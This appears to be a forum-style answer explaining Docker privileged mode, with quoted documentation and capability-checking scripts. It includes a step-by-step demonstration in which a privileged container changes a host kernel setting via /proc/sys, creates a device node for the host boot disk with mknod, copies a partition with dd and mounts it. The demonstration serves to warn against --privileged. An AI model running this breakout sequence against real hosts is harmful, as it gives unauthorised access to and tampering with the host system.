If I am running a container in privileged mode, does it have all the kernel capabilities, or do I need to add them separately?
We have run the 'fdisk -l' command to check that the container is running in privileged mode. Note: any command that requires the privileged flag to succeed can be used to test for privileged mode inside the container.
What is Docker Privileged Mode? Docker privileged mode grants a Docker container root capabilities to all devices on the host system. Running a container in privileged mode gives it the capabilities of its host machine. For example, it enables it to modify AppArmor and SELinux configurations.
By default, Docker containers are unprivileged. For example, in the default case, you cannot run a Docker daemon inside a Docker container. To give you control over a container's capabilities, Docker supports --cap-add and --cap-drop. For more details, see Runtime privilege and Linux capabilities.
When you run with the --privileged flag, SELinux labels are disabled, and the container runs with the label that the container engine was executed with. This label is usually unconfined and has the same full access as the container engine.
Running in privileged mode does indeed give the container all capabilities. But it is good practice to always give a container only the minimum privileges it needs.
The Docker run command documentation refers to this flag:
Full container capabilities (--privileged)
The --privileged flag gives all capabilities to the container, and it also lifts all the limitations enforced by the device cgroup controller. In other words, the container can then do almost everything that the host can do. This flag exists to allow special use-cases, like running Docker within Docker.
You can give specific capabilities using the --cap-add flag. See man 7 capabilities for more info on those capabilities. The literal names can be used, e.g. --cap-add CAP_FOWNER.
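To see which capabilities a process actually holds, you can decode the CapEff bitmask the kernel exposes in /proc/<pid>/status. The following is a minimal sketch rather than an official tool: the helper names has_cap and current_capeff are made up for illustration, and the bit numbers are the ones defined in linux/capability.h (CAP_FOWNER = 3, CAP_SYS_ADMIN = 21, CAP_MKNOD = 27).

```bash
#!/usr/bin/env bash
# Hypothetical helpers for inspecting the effective capability mask.

# Capability bit numbers as defined in linux/capability.h.
CAP_FOWNER=3
CAP_SYS_ADMIN=21
CAP_MKNOD=27

# Print the CapEff hex mask of the current shell (empty if unavailable).
current_capeff() {
  awk '/^CapEff:/ { print $2 }' "/proc/$$/status" 2>/dev/null
}

# has_cap <hex mask without 0x> <bit number>
# Succeeds (exit status 0) when that bit is set in the mask.
has_cap() {
  local mask_hex=$1 bit=$2
  (( (0x$mask_hex >> bit) & 1 ))
}

mask=$(current_capeff)
if [ -n "$mask" ]; then
  echo "CapEff: $mask"
  if has_cap "$mask" "$CAP_SYS_ADMIN"; then
    echo "CAP_SYS_ADMIN is present"
  else
    echo "CAP_SYS_ADMIN is absent"
  fi
fi
```

Run inside a container, this should report CAP_SYS_ADMIN as absent with Docker's default capability set (a mask commonly seen as 00000000a80425fb) and as present under --privileged.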
You never want to run a container using --privileged.
I am doing this on my laptop, which has NVMe drives, but it will work for any host:
docker run --privileged -t -i --rm ubuntu:latest bash
First, let's do something minor to test the /proc file system.
From the container:
root@507aeb767c7e:/# cat /proc/sys/vm/swappiness
60
root@507aeb767c7e:/# echo "61" > /proc/sys/vm/swappiness
root@507aeb767c7e:/# cat /proc/sys/vm/swappiness
60
OK, did it change it for the container or for the host?
$ cat /proc/sys/vm/swappiness
61
OOPS! We can arbitrarily change the host's kernel parameters. But this is just a denial-of-service (DoS) situation, so let's see if we can collect privileged information from the parent host.
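One way to tell from inside a container whether a write like this could go through is to check how /proc/sys is mounted: in an unprivileged container Docker normally mounts it read-only. A small sketch of that check follows; the function name is_readonly_mount is hypothetical, and it simply parses the mount table in /proc/mounts.

```bash
#!/usr/bin/env bash
# Hypothetical helper: succeed if <mountpoint> is listed with the "ro" option.
# is_readonly_mount <mountpoint> [mounts file, default /proc/mounts]
is_readonly_mount() {
  local mountpoint=$1 mounts_file=${2:-/proc/mounts}
  awk -v mp="$mountpoint" '
    $2 == mp {
      # Later entries for the same mount point override earlier ones.
      ro = 0
      n = split($4, opts, ",")
      for (i = 1; i <= n; i++) if (opts[i] == "ro") ro = 1
    }
    END { exit (ro ? 0 : 1) }
  ' "$mounts_file"
}

if is_readonly_mount /proc/sys; then
  echo "/proc/sys is mounted read-only: sysctl writes should fail"
else
  echo "/proc/sys is not a read-only mount: sysctl writes may reach the host"
fi
```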
Let's walk the /sys tree and find the major and minor numbers for the boot disk.
Note: I have two NVMe drives and containers are running under LVM on another drive
root@507aeb767c7e:/proc# cat /sys/block/nvme1n1/dev
259:2
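The value in /sys/block/<device>/dev is a major:minor pair, which is exactly what mknod takes as its last two arguments. As a small illustration (parse_devnum is a made-up helper name, not an existing tool), the pair can be split like this:

```bash
#!/usr/bin/env bash
# Hypothetical helper: split "major:minor" into two space-separated numbers.
parse_devnum() {
  local devnum=$1
  printf '%s %s\n' "${devnum%%:*}" "${devnum##*:}"
}

# List every block device the kernel exposes, with its device numbers.
for f in /sys/block/*/dev; do
  [ -r "$f" ] || continue
  name=${f#/sys/block/}
  name=${name%/dev}
  read -r major minor < <(parse_devnum "$(cat "$f")")
  echo "$name: major=$major minor=$minor"
done
```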
OK, let's make a device file in a location where the dbus rules won't auto scan:
root@507aeb767c7e:/proc# mknod /devnvme1n1 b 259 2
root@507aeb767c7e:/proc# sfdisk -d /devnvme1n1
label: gpt
label-id: 1BE1DF1D-3523-4F22-B22A-29FEF19F019E
device: /devnvme1n1
unit: sectors
first-lba: 34
last-lba: 2000409230
<SNIP>
OK, we can read the boot disk. Let's make a device file for one of the partitions. While we can't mount it because it is already open, we can still use dd to copy it.
root@507aeb767c7e:/proc# mknod /devnvme1n1p1 b 259 3
root@507aeb767c7e:/# dd if=devnvme1n1p1 of=foo.img
532480+0 records in
532480+0 records out
272629760 bytes (273 MB, 260 MiB) copied, 0.74277 s, 367 MB/s
OK, let's mount it and see if our efforts worked!
root@507aeb767c7e:/# mount -o loop foo.img /foo
root@507aeb767c7e:/# ls foo
EFI
root@507aeb767c7e:/# ls foo/EFI/
Boot Microsoft ubuntu
So basically, allowing anyone to launch a --privileged container on a container host is the same as giving them root access to that host, and therefore to every container on it.
Unfortunately, the Docker project has chosen the trusted computing model, and outside of auth plugins there is no way to protect against this, so always err on the side of adding only the features you need rather than using --privileged.
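As a rough sketch of that approach, the helper below assembles a docker run command line that drops every capability and adds back only the ones named. The function name build_run_cmd and the example capabilities are assumptions for illustration; --cap-drop ALL and --cap-add are the real Docker flags. It only prints the command, so you can review it before running it.

```bash
#!/usr/bin/env bash
# Hypothetical helper: build_run_cmd <image> [capability ...]
# Prints a `docker run` command that starts from zero capabilities
# and adds back only the listed ones.
build_run_cmd() {
  local image=$1
  shift
  local args=(docker run --rm --cap-drop ALL)
  local cap
  for cap in "$@"; do
    args+=(--cap-add "$cap")
  done
  args+=("$image")
  printf '%s\n' "${args[*]}"
}

# Example: a container that only needs to change network settings and the clock.
build_run_cmd ubuntu:latest NET_ADMIN SYS_TIME
```

Which capabilities a given workload really needs is something you have to determine case by case; man 7 capabilities describes what each one permits.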
There is a good article from Red Hat covering this.
While a Docker container running as "root" has fewer privileges than root on the host, it may still need hardening depending on your use case (a development environment versus a shared production cluster).